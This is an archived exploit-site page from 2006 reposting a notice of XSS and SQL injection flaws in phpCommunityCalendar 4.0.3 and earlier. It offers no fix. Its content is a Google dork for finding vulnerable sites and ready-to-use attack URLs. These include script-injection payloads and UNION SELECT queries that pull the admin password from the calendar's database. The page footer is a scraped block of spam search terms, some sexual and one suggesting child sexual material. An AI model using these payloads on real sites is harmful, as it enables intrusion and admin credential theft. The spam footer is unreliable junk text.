about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , phpCommunityCalendar <= 4.0.3 Multiple (XSS/SQL) Vulnerabilites



2006-05-23 phpCommunityCalendar <= 4.0.3 Multiple (XSS/SQL) Vulnerabilites
Rated as : High Risk

##################################################################################
#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<#
##################################################################################
#										 #
#	 phpCommunityCalendar 4.0.3 Multiple Vulnerabilites		         #
#										 #
##################################################################################
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>#
##################################################################################
#										 #
#  author      : X0r_1   							 #
#  release     : 23.05.06							 #
#  software    : http://www.appideas.com/	  				 #
#  googledork  : "Calendar programming by AppIdeas.com"
filetype:php   		 #
#										 #
##################################################################################

XSS:

http://[SERVER]/[PATH]/week.php?LoName=<script>alert('XSS')</script>

http://[SERVER]/[PATH]/month.php?LoName=<script>alert('XSS')</script>

http://[SERVER]/[PATH]/event.php?AddressLink="><script>alert('XSS')</script><"


SQL Injections:

http://[SERVER]/[PATH]/month.php?query=CalendarDetailsID=-1) UNION SELECT
Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[SERVER]/[PATH]/day.php?query=CalendarDetailsID=-1) UNION SELECT
Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[SERVER]/[PATH]/event.php?ID=(1=1) [SQL]

http://[SERVER]/[PATH]/admin/delCalendar.php?CalendarDetailsID=x'[SQL]

http://[SERVER]/[PATH]/admin/delAdmin.php?AdminUserID=x' [SQL]

http://[SERVER]/[PATH]/admin/delAddress.php?EventLocationID=x' [SQL]

http://[SERVER]/[PATH]/admin/delCategory.php?LocationID=x' [SQL]


securitydot.net - 2006-05-23

Advertising

Copyright 2007, SecurityDot
Wed, 03 Dec 2008 09:01:41 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
preteensex t728t www.soundp 200 /compo Kaede Www.hollwo Alesha.Mp3 bbs.002pc. www.5kum.c rdesktop CMS is Fre Linux 2.6. Naruto sex t239t lo69l sax.com www.vedio t214t bollywoods WWW.INDIN. t214t Sex di bal XL girls muzyka t619t redhat as freevedioc sex overflow b ms jammu Foto artis masalasexs picture se sexy ofthe Babes.hot trumpetame vuln/explo NIGAR KHAN bulefilm elvideopor seximager tins gambarmeme ram W880 indian nud 200 /compo msn hack vBulletin six vedio